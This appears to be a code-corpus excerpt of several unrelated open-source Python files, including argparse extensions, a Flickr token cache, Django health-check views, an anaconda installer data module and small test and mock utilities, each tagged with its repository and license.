new_file = os.path.join(self.makeDir(), "new_file")
append_text_file(new_file, u"contents ☃")
self.assertFileContent(new_file, b"contents \xe2\x98\x83")
def test_append_existing_binary_file(self):
"""
The L{append_text_file} function appends contents to an existing file.
"""
existing_file = self.makeFile("foo bar")
append_binary_file(existing_file, b" baz \xe2\x98\x83")
self.assertFileContent(existing_file, b"foo bar baz \xe2\x98\x83")
def test_append_binary_no_file(self):
"""
The L{append_text_file} function creates a new file if one doesn't
exist already.
"""
new_file = os.path.join(self.makeDir(), "new_file")
append_binary_file(new_file, b"contents \xe2\x98\x83")
self.assertFileContent(new_file, b"contents \xe2\x98\x83")
| CanonicalLtd/landscape-client | landscape/lib/tests/test_fs.py | Python | gpl-2.0 | 6,532 |
# -*- coding: utf-8 -*-
"""
Extensions to the argparse library for calmjs.
a.k.a. nyanpasu
"""
from __future__ import absolute_import
import argparse
import sys
import textwrap
from functools import partial
from os import linesep
from os.path import pathsep
from argparse import _
from argparse import Action
from argparse import HelpFormatter
from pkg_resources import working_set as default_working_set
from pkg_resources import Requirement
from calmjs.utils import requirement_comma_list
ATTR_INFO = '_calmjs_runtime_info'
ATTR_ROOT_PKG = '_calmjs_root_pkg_name'
def metavar(name):
return '<' + name.lower() + '>'
class Namespace(argparse.Namespace):
"""
This implementation retains existing parsed value for matched types,
in the context of sub-parsers.
"""
def __setattr__(self, name, value):
if hasattr(self, name):
original_value = getattr(self, name)
if isinstance(original_value, dict) and isinstance(value, dict):
original_value.update(value)
value = original_value
elif isinstance(original_value, list) and isinstance(value, list):
original_value.extend(value)
value = original_value
super(Namespace, self).__setattr__(name, value)
class HyphenNoBreakHelpFormatter(HelpFormatter):
def _split_lines(self, text, width):
text = self._whitespace_matcher.sub(' ', text).strip()
return textwrap.wrap(text, width, break_on_hyphens=False)
class SortedHelpFormatter(HelpFormatter):
def add_arguments(self, actions):
def key_func(action):
option_strings = getattr(action, 'option_strings', None)
if not option_strings:
return option_strings
# normalize it to lower case.
arg = option_strings[0]
return arg.startswith('--'), arg.lower()
actions = sorted(actions, key=key_func)
super(SortedHelpFormatter, self).add_arguments(actions)
class CalmJSHelpFormatter(SortedHelpFormatter, HyphenNoBreakHelpFormatter):
"""
The official formatter for this project
"""
class Version(Action):
"""
Version reporting for a console_scripts entry_point
"""
def __init__(self, *a, **kw):
kw['nargs'] = 0
super(Version, self).__init__(*a, **kw)
def get_dist_info(self, dist, default_name='?'):
name = getattr(dist, 'project_name', default_name)
version = getattr(dist, 'version', '?')
location = getattr(dist, 'location', '?')
return name, version, location
def __call__(self, parser, namespace, values, option_string=None):
"""
Invoke to get version.
"""
# I really do not like this implementation, but under Python 2.7
# argparser is broken with subcommands and it quits with too few
# arguments too soon.
# Related issues:
# http://bugs.python.org/issue9253#msg186387
# http://bugs.python.org/issue10424
rt_pkg_name = getattr(parser, ATTR_ROOT_PKG, None)
results = []
if rt_pkg_name:
# We can use this directly as nothing else should be cached
# where this is typically invoked.
# if the argparser is dumber (which makes it smarter) and
# doesn't have code that randomly call exit on its own with
# other _default_ Actions it provides, a flag could just
# simply be marked and/or returned to inform the caller
# (i.e. the run time) to handle that.
dist = default_working_set.find(Requirement.parse(rt_pkg_name))
results.append('%s %s from %s' % self.get_dist_info(dist))
results.append(linesep)
infos = getattr(parser, ATTR_INFO, [])
for info in infos:
prog, rt_dist = info
results.append(
prog + ': %s %s from %s' % self.get_dist_info(rt_dist))
results.append(linesep)
if not results:
results = ['no package information available.']
# I'd rather return the results than just exiting outright, but
# remember the bugs that will make an error happen otherwise...
# quit early so they don't bug.
for i in results:
sys.stdout.write(i)
sys.exit(0)
class MultiChoice(object):
def __init__(self, choices=(), sep=','):
self.__original = choices
self.__choices = set(choices)
self.__sep = sep
def __contains__(self, other):
return not (set(other.split(self.__sep)) - self.__choices)
def __iter__(self):
for i in self.__original:
yield i
class StoreDelimitedListBase(Action):
def __init__(self, option_strings, dest, sep=',', maxlen=None, **kw):
self.sep = sep
self.maxlen = maxlen
kw['nargs'] = 1
kw['const'] = None
default = kw.get('default')
if 'choices' in kw:
kw['choices'] = MultiChoice(choices=kw['choices'], sep=sep)
if default is not None and not isinstance(default, (tuple, list)):
raise ValueError(
'provided default for store delimited list must be a list or '
'tuple.'
)
super(StoreDelimitedListBase, self).__init__(
option_strings=option_strings, dest=dest, **kw)
def _convert(self, values):
result = values[0].split(self.sep)
if result[-1] == '':
result.pop(-1)
return result
def __call__(self, parser, namespace, values, option_string=None):
if not hasattr(namespace, self.dest) or getattr(
namespace, self.dest) is self.default:
value = []
else:
value = getattr(namespace, self.dest)
result = value + self._convert(values)
if self.maxlen:
result = result[:self.maxlen]
# use the root object's version to be sure that is reset.
object.__setattr__(namespace, self.dest, result)
class StoreCommaDelimitedList(StoreDelimitedListBase):
def __init__(self, option_strings, dest, **kw):
super(StoreCommaDelimitedList, self).__init__(
option_strings=option_strings, dest=dest, sep=',', **kw)
StoreDelimitedList = StoreCommaDelimitedList
class StorePathSepDelimitedList(StoreDelimitedListBase):
def __init__(self, option_strings, dest, **kw):
super(StorePathSepDelimitedList, self).__init__(
option_strings=option_strings, dest=dest, sep=pathsep, **kw)
class StoreRequirementList(StoreDelimitedListBase):
def _convert(self, values):
return requirement_comma_list.split(values[0])
class DeprecatedAction(Action):
def __init__(self, original_action_cls, deprecation, *a, **kw):
self.original_action = original_action_cls(*a, **kw)
# copy the kwargs from within to ensure API compatibility and
# expectations
kw.update(self.original_action._get_kwargs())
# only set message if it's a string.
self.deprecation = '' if deprecation is True else deprecation
kw['help'] = argparse.SUPPRESS
super(DeprecatedAction, self).__init__(*a, **kw)
def __call__(self, parser, namespace, values, option_string=None):
import warnings
msg = "option '%s' is deprecated" % option_string
if self.deprecation:
msg = msg + ': ' + self.deprecation
warnings.warn(msg, DeprecationWarning)
return self.original_action(
parser, namespace, values, option_string=option_string)
class ArgumentParser(argparse.ArgumentParser):
def __init__(self, formatter_class=CalmJSHelpFormatter, **kw):
super(ArgumentParser, self).__init__(
formatter_class=formatter_class, **kw)
# In Python 3, this particular error message was removed, so we will
# do this for Python 2 in this blunt manner.
def error(self, message):
if message != _('too few arguments'):
super(ArgumentParser, self).error(message)
def parse_known_args(self, args=None, namespace=None):
if namespace is None:
namespace = Namespace()
return super(ArgumentParser, self).parse_known_args(args, namespace)
def _pop_action_class(self, kwargs, default=None):
deprecation = kwargs.pop('deprecation', None)
action = super(ArgumentParser, self)._pop_action_class(kwargs, default)
if deprecation:
# as the deprecation class acts as a wrapper
action = partial(
DeprecatedAction,
original_action_cls=action,
deprecation=deprecation,
)
return action
def soft_error(self, message):
"""
Same as error, without the dying in a fire part.
"""
self.print_usage(sys.stderr)
args = {'prog': self.prog, 'message': message}
self._print_message(
_('%(prog)s: error: %(message)s\n') % args, sys.stderr)
def unrecognized_arguments_error(self, args):
self.soft_error(_('unrecognized arguments: %s') % ' '.join(args))
| calmjs/calmjs | src/calmjs/argparse.py | Python | gpl-2.0 | 9,195 |
'''Persistent token cache management for the Flickr API'''
import os.path
import logging
logging.basicConfig()
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
__all__ = ('TokenCache', 'SimpleTokenCache')
class SimpleTokenCache(object):
'''In-memory token cache.'''
def __init__(self):
self.token = None
def forget(self):
'''Removes the cached token'''
self.token = None
class TokenCache(object):
'''On-disk persistent token cache for a single application.
The application is identified by the API key used. Per
application multiple users are supported, with a single
token per user.
'''
def __init__(self, api_key, username=None):
'''Creates a new token cache instance'''
self.api_key = api_key
self.username = username
self.memory = {}
def __get_cached_token_path(self):
"""Return the directory holding the app data."""
return os.path.expanduser(os.path.join("~", ".flickr", self.api_key))
def __get_cached_token_filename(self):
"""Return the full pathname of the cached token file."""
if self.username:
filename = 'auth-%s.token' % self.username
else:
filename = 'auth.token'
return os.path.join(self.__get_cached_token_path(), filename)
def __get_cached_token(self):
"""Read and return a cached token, or None if not found.
The token is read from the cached token file.
"""
# Only read the token once
if self.username in self.memory:
return self.memory[self.username]
try:
f = file(self.__get_cached_token_filename(), "r")
token = f.read()
f.close()
return token.strip()
except IOError:
return None
def __set_cached_token(self, token):
"""Cache a token for later use."""
# Remember for later use
self.memory[self.username] = token
path = self.__get_cached_token_path()
if not os.path.exists(path):
os.makedirs(path)
f = file(self.__get_cached_token_filename(), "w")
print >>f, token
f.close()
def forget(self):
'''Removes the cached token'''
if self.username in self.memory:
del self.memory[self.username]
filename = self.__get_cached_token_filename()
if os.path.exists(filename):
os.unlink(filename)
token = property(__get_cached_token, __set_cached_token, forget, "The cached token")
| jwheare/digest | lib/flickrapi/tokencache.py | Python | bsd-3-clause | 2,638 |
from collections import Counter
from datetime import timedelta as td
from itertools import tee
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db.models import Count
from django.http import HttpResponseBadRequest, HttpResponseForbidden
from django.shortcuts import get_object_or_404, redirect, render
from django.utils import timezone
from django.utils.crypto import get_random_string
from django.utils.six.moves.urllib.parse import urlencode
from hc.api.decorators import uuid_or_400
from hc.api.models import DEFAULT_GRACE, DEFAULT_TIMEOUT, Channel, Check, Ping
from hc.front.forms import AddChannelForm, AddWebhookForm, NameTagsForm, TimeoutForm
# from itertools recipes:
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = tee(iterable)
next(b, None)
return zip(a, b)
@login_required
def my_checks(request):
q = Check.objects.filter(user=request.team.user).order_by("created")
checks = list(q)
counter = Counter()
down_tags, grace_tags = set(), set()
for check in checks:
status = check.get_status()
for tag in check.tags_list():
if tag == "":
continue
counter[tag] += 1
if status == "down":
down_tags.add(tag)
elif check.in_grace_period():
grace_tags.add(tag)
ctx = {
"page": "checks",
"checks": checks,
"now": timezone.now(),
"tags": counter.most_common(),
"down_tags": down_tags,
"grace_tags": grace_tags,
"ping_endpoint": settings.PING_ENDPOINT
}
return render(request, "front/my_checks.html", ctx)
def _welcome_check(request):
check = None
if "welcome_code" in request.session:
code = request.session["welcome_code"]
check = Check.objects.filter(code=code).first()
if check is None:
check = Check()
check.save()
request.session["welcome_code"] = str(check.code)
return check
def index(request):
if request.user.is_authenticated():
return redirect("hc-checks")
check = _welcome_check(request)
ctx = {
"page": "welcome",
"check": check,
"ping_url": check.url(),
"enable_pushover": settings.PUSHOVER_API_TOKEN is not None
}
return render(request, "front/welcome.html", ctx)
def docs(request):
check = _welcome_check(request)
ctx = {
"page": "docs",
"section": "home",
"ping_endpoint": settings.PING_ENDPOINT,
"check": check,
"ping_url": check.url()
}
return render(request, "front/docs.html", ctx)
def docs_api(request):
ctx = {
"page": "docs",
"section": "api",
"SITE_ROOT": settings.SITE_ROOT,
"PING_ENDPOINT": settings.PING_ENDPOINT,
"default_timeout": int(DEFAULT_TIMEOUT.total_seconds()),
"default_grace": int(DEFAULT_GRACE.total_seconds())
}
return render(request, "front/docs_api.html", ctx)
def about(request):
return render(request, "front/about.html", {"page": "about"})
@login_required
def add_check(request):
assert request.method == "POST"
check = Check(user=request.team.user)
check.save()
check.assign_all_channels()
return redirect("hc-checks")
@login_required
@uuid_or_400
def update_name(request, code):
assert request.method == "POST"
check = get_object_or_404(Check, code=code)
if check.user_id != request.team.user.id:
return HttpResponseForbidden()
form = NameTagsForm(request.POST)
if form.is_valid():
check.name = form.cleaned_data["name"]
check.tags = form.cleaned_data["tags"]
check.save()
return redirect("hc-checks")
@login_required
@uuid_or_400
def update_timeout(request, code):
assert request.method == "POST"
check = get_object_or_404(Check, code=code)
if check.user != request.team.user:
return HttpResponseForbidden()
form = TimeoutForm(request.POST)
if form.is_valid():
check.timeout = td(seconds=form.cleaned_data["timeout"])
check.grace = td(seconds=form.cleaned_data["grace"])
check.save()
return redirect("hc-checks")
@login_required
@uuid_or_400
def remove_check(request, code):
assert request.method == "POST"
check = get_object_or_404(Check, code=code)
if check.user != request.team.user:
return HttpResponseForbidden()
check.delete()
return redirect("hc-checks")
@login_required
@uuid_or_400
def log(request, code):
check = get_object_or_404(Check, code=code)
if check.user != request.team.user:
return HttpResponseForbidden()
limit = request.team.ping_log_limit
pings = Ping.objects.filter(owner=check).order_by("-id")[:limit]
pings = list(pings.iterator())
# oldest-to-newest order will be more convenient for adding
# "not received" placeholders:
pings.reverse()
# Add a dummy ping object at the end. We iterate over *pairs* of pings
# and don't want to handle a special case of a check with a single ping.
pings.append(Ping(created=timezone.now()))
# Now go through pings, calculate time gaps, and decorate
# the pings list for convenient use in template
wrapped = []
early = False
for older, newer in pairwise(pings):
wrapped.append({"ping": older, "early": early})
# Fill in "missed ping" placeholders:
expected_date = older.created + check.timeout
n_blanks = 0
while expected_date + check.grace < newer.created and n_blanks < 10:
wrapped.append({"placeholder_date": expected_date})
expected_date = expected_date + check.timeout
n_blanks += 1
# Prepare early flag for next ping to come
early = older.created + check.timeout > newer.created + check.grace
reached_limit = len(pings) > limit
wrapped.reverse()
ctx = {
"check": check,
"pings": wrapped,
"num_pings": len(pings),
"limit": limit,
"show_limit_notice": reached_limit and settings.USE_PAYMENTS
}
return render(request, "front/log.html", ctx)
@login_required
def channels(request):
if request.method == "POST":
code = request.POST["channel"]
try:
channel = Channel.objects.get(code=code)
except Channel.DoesNotExist:
return HttpResponseBadRequest()
if channel.user_id != request.team.user.id:
return HttpResponseForbidden()
new_checks = []
for key in request.POST:
if key.startswith("check-"):
code = key[6:]
try:
check = Check.objects.get(code=code)
except Check.DoesNotExist:
return HttpResponseBadRequest()
if check.user_id != request.team.user.id:
return HttpResponseForbidden()
new_checks.append(check)
channel.checks = new_checks
return redirect("hc-channels")
channels = Channel.objects.filter(user=request.team.user).order_by("created")
channels = channels.annotate(n_checks=Count("checks"))
num_checks = Check.objects.filter(user=request.team.user).count()
ctx = {
"page": "channels",
"channels": channels,
"num_checks": num_checks,
"enable_pushover": settings.PUSHOVER_API_TOKEN is not None,
}
return render(request, "front/channels.html", ctx)
def do_add_channel(request, data):
form = AddChannelForm(data)
if form.is_valid():
channel = form.save(commit=False)
channel.user = request.team.user
channel.save()
channel.assign_all_checks()
if channel.kind == "email":
channel.send_verify_link()
return redirect("hc-channels")
else:
return HttpResponseBadRequest()
@login_required
def add_channel(request):
assert request.method == "POST"
return do_add_channel(request, request.POST)
@login_required
@uuid_or_400
def channel_checks(request, code):
channel = get_object_or_404(Channel, code=code)
if channel.user_id != request.team.user.id:
return HttpResponseForbidden()
assigned = set(channel.checks.values_list('code', flat=True).distinct())
checks = Check.objects.filter(user=request.team.user).order_by("created")
ctx = {
"checks": checks,
"assigned": assigned,
"channel": channel
}
return render(request, "front/channel_checks.html", ctx)
@uuid_or_400
def verify_email(request, code, token):
channel = get_object_or_404(Channel, code=code)
if channel.make_token() == token:
channel.email_verified = True
channel.save()
return render(request, "front/verify_email_success.html")
return render(request, "bad_link.html")
@login_required
@uuid_or_400
def remove_channel(request, code):
assert request.method == "POST"
# user may refresh the page during POST and cause two deletion attempts
channel = Channel.objects.filter(code=code).first()
if channel:
if channel.user != request.team.user:
return HttpResponseForbidden()
channel.delete()
return redirect("hc-channels")
@login_required
def add_email(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_email.html", ctx)
@login_required
def add_webhook(request):
if request.method == "POST":
form = AddWebhookForm(request.POST)
if form.is_valid():
channel = Channel(user=request.team.user, kind="webhook")
channel.value = form.get_value()
channel.save()
channel.assign_all_checks()
return redirect("hc-channels")
else:
form = AddWebhookForm()
ctx = {"page": "channels", "form": form}
return render(request, "integrations/add_webhook.html", ctx)
@login_required
def add_pd(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_pd.html", ctx)
@login_required
def add_slack(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_slack.html", ctx)
@login_required
def add_hipchat(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_hipchat.html", ctx)
@login_required
def add_pushover(request):
if settings.PUSHOVER_API_TOKEN is None or \
settings.PUSHOVER_SUBSCRIPTION_URL is None:
return HttpResponseForbidden()
if request.method == "POST":
# Initiate the subscription
nonce = get_random_string()
request.session["po_nonce"] = nonce
failure_url = settings.SITE_ROOT + reverse("hc-channels")
success_url = settings.SITE_ROOT + reverse("hc-add-pushover") + "?" + \
urlencode({
"nonce": nonce,
"prio": request.POST.get("po_priority", "0"),
})
subscription_url = settings.PUSHOVER_SUBSCRIPTION_URL + "?" + \
urlencode({
"success": success_url,
"failure": failure_url,
})
return redirect(subscription_url)
# Handle successful subscriptions
if "pushover_user_key" in request.GET:
if "nonce" not in request.GET or "prio" not in request.GET:
return HttpResponseBadRequest()
# Validate nonce
if request.GET["nonce"] != request.session.get("po_nonce"):
return HttpResponseForbidden()
# Validate priority
if request.GET["prio"] not in ("-2", "-1", "0", "1", "2"):
return HttpResponseBadRequest()
# All looks well--
del request.session["po_nonce"]
if request.GET.get("pushover_unsubscribed") == "1":
# Unsubscription: delete all Pushover channels for this user
Channel.objects.filter(user=request.user, kind="po").delete()
return redirect("hc-channels")
else:
# Subscription
user_key = request.GET["pushover_user_key"]
priority = int(request.GET["prio"])
return do_add_channel(request, {
"kind": "po",
"value": "%s|%d" % (user_key, priority),
})
# Show Integration Settings form
ctx = {
"page": "channels",
"po_retry_delay": td(seconds=settings.PUSHOVER_EMERGENCY_RETRY_DELAY),
"po_expiration": td(seconds=settings.PUSHOVER_EMERGENCY_EXPIRATION),
}
return render(request, "integrations/add_pushover.html", ctx)
@login_required
def add_victorops(request):
ctx = {"page": "channels"}
return render(request, "integrations/add_victorops.html", ctx)
def privacy(request):
return render(request, "front/privacy.html", {})
def terms(request):
return render(request, "front/terms.html", {})
| BetterWorks/healthchecks | hc/front/views.py | Python | bsd-3-clause | 12,979 |
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Abstract multi-modal model."""
import abc
import tensorflow as tf
class MultiModalModel(tf.keras.Model):
"""Abstract base class for multi-modal video understanding."""
def __init__(self, is_training):
"""Constructor."""
super(MultiModalModel, self).__init__()
self.is_training = is_training
# Input, output, model, parameter, preprocessor for each modality.
self.feature_to_output = {}
self.feature_to_model = {}
self.feature_to_params = {}
self.feature_to_preprocessor = {}
@abc.abstractmethod
def call(self, inputs):
"""Execute the model with inputs."""
raise NotImplementedError
@abc.abstractmethod
def restore_from_objects(self, checkpoint_type):
"""Restore model from trackable objects."""
raise NotImplementedError
@abc.abstractmethod
def loss(self, features, pred_dict, target_dict):
"""Compute losses."""
raise NotImplementedError
@abc.abstractmethod
def predict(self, features, dataset_config):
"""Produce predictions given the features."""
raise NotImplementedError
@abc.abstractmethod
def get_metrics(self, eval_config):
"""Get model specific metrics given the eval_config."""
raise NotImplementedError
@abc.abstractmethod
def compute_metrics(self, eval_dict, eval_metrics, **kwargs):
"""Compute metrics."""
raise NotImplementedError
def visualization(self, eval_config, eval_dataset_config, **kwargs):
"""Model specific visualization."""
pass
| google-research/mint | mint/core/multi_modal_model.py | Python | apache-2.0 | 2,064 |
#
# instdata.py - central store for all configuration data needed to install
#
# Erik Troan <ewt@redhat.com>
#
# Copyright 2001-2007 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import os
import string
import language
import network
import firewall
import security
import timezone
import desktop
import fsset
import bootloader
import partitions
import partedUtils
import iscsi
import zfcp
import urllib
import iutil
import users
import rhpl
from flags import *
from constants import *
from rhpl.simpleconfig import SimpleConfigFile
import rhpl.keyboard as keyboard
import logging
log = logging.getLogger("anaconda")
# Collector class for all data related to an install/upgrade.
class InstallData:
def reset(self):
# Reset everything except:
#
# - The mouse
# - The install language
# - The keyboard
self.instClass = None
self.network = network.Network()
self.iscsi = iscsi.iscsi()
self.zfcp = zfcp.ZFCP()
self.firewall = firewall.Firewall()
self.security = security.Security()
self.timezone = timezone.Timezone()
self.users = None
self.rootPassword = { "isCrypted": False, "password": "" }
self.auth = "--enableshadow --enablemd5"
self.desktop = desktop.Desktop()
self.upgrade = None
# XXX move fsset and/or diskset into Partitions object?
self.fsset.reset()
self.diskset = partedUtils.DiskSet(self.anaconda)
self.partitions = partitions.Partitions()
self.bootloader = bootloader.getBootloader()
self.dependencies = []
self.dbpath = None
self.upgradeRoot = None
self.rootParts = None
self.upgradeSwapInfo = None
self.upgradeDeps = ""
self.upgradeRemove = []
self.upgradeInfoFound = None
if rhpl.getArch() == "s390":
self.firstboot = FIRSTBOOT_SKIP
else:
self.firstboot = FIRSTBOOT_DEFAULT
# XXX I expect this to die in the future when we have a single data
# class and translate ksdata into that instead.
self.ksdata = None
def setInstallProgressClass(self, c):
self.instProgress = c
def setDisplayMode(self, display_mode):
self.displayMode = display_mode
# expects a Keyboard object
def setKeyboard(self, keyboard):
self.keyboard = keyboard
# expects a Mouse object
def setMouse(self, mouse):
self.mouse = mouse
# expects a VideoCardInfo object
def setVideoCard(self, video):
self.videocard = video
# expects a Monitor object
def setMonitor(self, monitor):
self.monitor = monitor
# expects an XSetup object
def setXSetup(self, xsetup):
self.xsetup = xsetup
# expects 0/1
def setHeadless(self, isHeadless):
self.isHeadless = isHeadless
def setKsdata(self, ksdata):
self.ksdata = ksdata
# if upgrade is None, it really means False. we use None to help the
# installer ui figure out if it's the first time the user has entered
# the examine_gui screen. --dcantrell
def getUpgrade (self):
if self.upgrade == None:
return False
else:
return self.upgrade
def setUpgrade (self, bool):
self.upgrade = bool
def getSalt(self):
if self.auth.find("--enablemd5") != -1 or \
self.auth.find("--passalgo=md5") != -1:
return 'md5'
elif self.auth.find("--passalgo=sha256") != -1:
return 'sha256'
elif self.auth.find("--passalgo=sha512") != -1:
return 'sha512'
else:
return None
def write(self):
self.instLanguage.write (self.anaconda.rootPath)
if not self.isHeadless:
self.keyboard.write (self.anaconda.rootPath)
self.timezone.write (self.anaconda.rootPath)
args = ["--update", "--nostart"] + self.auth.split()
try:
if not flags.test:
iutil.execWithRedirect("/usr/sbin/authconfig", args,
stdout = None, stderr = None,
root = self.anaconda.rootPath)
else:
log.error("Would have run: %s", args)
except RuntimeError, msg:
log.error("Error running %s: %s", args, msg)
self.firewall.write (self.anaconda.rootPath)
self.security.write (self.anaconda.rootPath)
self.users = users.Users()
# make sure crypt_style in libuser.conf matches the salt we're using
users.createLuserConf(self.anaconda.rootPath, saltname=self.getSalt())
# User should already exist, just without a password.
self.users.setRootPassword(self.rootPassword["password"],
self.rootPassword["isCrypted"],
salt=self.getSalt())
# Make sure multipathd is set to run for mpath installs (#243421)
if flags.mpath:
svc = 'multipathd'
if self.anaconda.isKickstart:
try:
hasSvc = self.ksdata.services["enabled"].index(svc)
except:
self.ksdata.services["enabled"].append(svc)
else:
iutil.execWithRedirect("/sbin/chkconfig",
[svc, "on"],
stdout="/dev/tty5", stderr="/dev/tty5",
root=self.anaconda.rootPath)
if self.anaconda.isKickstart:
for svc in self.ksdata.services["disabled"]:
iutil.execWithRedirect("/sbin/chkconfig",
[svc, "off"],
stdout="/dev/tty5", stderr="/dev/tty5",
root=self.anaconda.rootPath)
for svc in self.ksdata.services["enabled"]:
iutil.execWithRedirect("/sbin/chkconfig",
[svc, "on"],
stdout="/dev/tty5", stderr="/dev/tty5",
root=self.anaconda.rootPath)
for ud in self.ksdata.userList:
if self.users.createUser(ud.name, ud.password, ud.isCrypted,
ud.groups, ud.homedir, ud.shell,
ud.uid, root=self.anaconda.rootPath,
salt=self.getSalt()) == None:
log.error("User %s already exists, not creating." % ud.name)
if self.anaconda.id.instClass.installkey and os.path.exists(self.anaconda.rootPath + "/etc/sysconfig/rhn"):
f = open(self.anaconda.rootPath + "/etc/sysconfig/rhn/install-num", "w+")
f.write("%s\n" %(self.anaconda.id.instClass.installkey,))
f.close()
os.chmod(self.anaconda.rootPath + "/etc/sysconfig/rhn/install-num",
0600)
def writeKS(self, filename):
f = open(filename, "w")
f.write("# Kickstart file automatically generated by anaconda.\n\n")
if self.upgrade:
f.write("upgrade\n");
else:
f.write("install\n");
# figure out the install method and write out a line
if self.methodstr.startswith('ftp://') or self.methodstr.startswith('http://'):
f.write("url --url %s\n" % urllib.unquote(self.methodstr))
elif self.methodstr.startswith('cdrom://'):
f.write("cdrom\n")
elif self.methodstr.startswith('hd://'):
pidx = string.find(self.methodstr, '//') + 2
didx = string.find(self.methodstr[pidx:], '/')
partition = string.split(self.methodstr[pidx:pidx+didx], ':')[0]
dir = self.methodstr[pidx+didx+1:]
f.write("harddrive --partition=%s --dir=%s\n" % (partition, dir))
elif self.methodstr.startswith('nfs:/') or self.methodstr.startswith('nfsiso:'):
(method, tmpmntpt) = string.split(self.methodstr, ':')
# clean up extra '/' at front
if tmpmntpt[1] == '/':
rawmntpt = tmpmntpt[1:]
else:
rawmntpt = tmpmntpt
mntpt = os.path.normpath(rawmntpt)
# find mntpt in /proc/mounts so we can get NFS server info
fproc = open("/proc/mounts", "r")
lines = fproc.readlines()
fproc.close()
for l in lines:
minfo = string.split(l)
if len(minfo) > 1 and minfo[1] == mntpt and minfo[0].find(":") != -1:
(srv, dir) = minfo[0].split(':')
f.write("nfs --server=%s --dir=%s\n" % (srv, dir))
break
if self.instClass.skipkey:
f.write("key --skip\n")
elif self.instClass.installkey:
f.write("key %s\n" %(self.instClass.installkey,))
self.instLanguage.writeKS(f)
if not self.isHeadless:
self.keyboard.writeKS(f)
self.xsetup.writeKS(f, self.desktop, self.ksdata)
self.network.writeKS(f)
self.zfcp.writeKS(f)
self.iscsi.writeKS(f)
if self.rootPassword["isCrypted"]:
f.write("rootpw --iscrypted %s\n" % self.rootPassword["password"])
else:
f.write("rootpw --iscrypted %s\n" % users.cryptPassword(self.rootPassword["password"], salt=self.getSalt()))
self.firewall.writeKS(f)
if self.auth.strip() != "":
f.write("authconfig %s\n" % self.auth)
self.security.writeKS(f)
self.timezone.writeKS(f)
self.bootloader.writeKS(f)
self.partitions.writeKS(f)
if self.backend is not None:
self.backend.writeKS(f)
self.backend.writePackagesKS(f, self.anaconda)
# make it so only root can read, could have password
os.chmod(filename, 0600)
def __init__(self, anaconda, extraModules, floppyDevice, methodstr, displayMode, backend = None):
self.displayMode = displayMode
self.instLanguage = language.Language(self.displayMode)
self.keyboard = keyboard.Keyboard()
self.backend = backend
self.anaconda = anaconda
self.mouse = None
self.monitor = None
self.videocard = None
self.xsetup = None
self.isHeadless = 0
self.extraModules = extraModules
self.floppyDevice = floppyDevice
self.fsset = fsset.FileSystemSet(anaconda)
self.excludeDocs = 0
if flags.cmdline.has_key("excludedocs"):
self.excludeDocs = 1
self.methodstr = methodstr
self.reset()
| sergey-senozhatsky/anaconda-11-vlan-support | instdata.py | Python | gpl-2.0 | 10,561 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gstmanager.sbins.source import AudioSource
class AudioTestSource(AudioSource):
def __init__(self):
self.description = "Audio test Source class, generates 440Hz tone"
self.type = "audio"
sbin = "audiotestsrc"
AudioSource.__init__(self, sbin)
| lucasa/landell_gst-gengui | sltv/gstmanager/sbins/sources/audiotest.py | Python | gpl-2.0 | 330 |
''' Mock implementations of the Data and DataFactory classes. '''
from smcity.models.data import Data, DataFactory
class MockData:
''' Mock implementation of the data class. '''
def __init__(self, data):
self.data = data
def get_content(self):
return self.data['content']
def get_datum_id(self):
return self.data['id']
def get_location(self):
return self.data['location']
def get_set_id(self):
return self.data['set_id']
def get_timestamp(self):
return self.data['timestamp']
def get_type(self):
return self.data['type']
class MockDataFactory:
''' Mock implementation of the DataFactory class. '''
def create_data(self, content, id, location, set_id, timestamp, type):
''' {@inheritDocs} '''
self.created_data = {
'content' : content,
'id' : id,
'location' : location,
'set_id' : set_id,
'timestamp' : timestamp,
'type' : type
}
def copy_data(self, set_id, data):
''' {@inheritDocs} '''
self.copied_data = data
self.copied_data_set_id = set_id
def filter_global_data(self, min_timestamp=None, max_timestamp=None,
min_lat=None, max_lat=None,
min_lon=None, max_lon=None,
segment_id=0, num_segments=1,
type=None):
''' {@inheritDocs} '''
return self.data
def get_data_set(self, set_id):
''' {@inheritDocs} '''
return self.data
| ChaseSnapshot/smcity | smcity/models/test/mock_data.py | Python | unlicense | 1,636 |
# Copyright 2021 Camptocamp SA
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import datetime
def roundTimeDT(dt=None, dateDelta=None):
"""Round a datetime object to a multiple of a timedelta
:param dt: datetime.datetime object, default now.
:param dateDelta: timedelta object, we round to a multiple of this, default 1 minute.
Author: Thierry Husson 2012 - Use it as you want but don't blame me.
Stijn Nevens 2014 - Changed to use only datetime objects as variables
"""
dateDelta = dateDelta or datetime.timedelta(minutes=1)
roundTo = dateDelta.total_seconds()
if dt is None:
dt = datetime.datetime.now()
seconds = (dt - dt.min).seconds
# // is a floor division, not a comment on following line:
rounding = (seconds + roundTo / 2) // roundTo * roundTo
return dt + datetime.timedelta(0, rounding - seconds, -dt.microsecond)
def roundTime(dt=None, hours=0, minutes=0, seconds=0):
return roundTimeDT(
dt=dt,
dateDelta=datetime.timedelta(hours=hours, minutes=minutes, seconds=seconds),
)
| OCA/sale-workflow | sale_product_seasonality/utils.py | Python | agpl-3.0 | 1,102 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2012-2013 Hector Martin "marcan" <hector@marcansoft.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
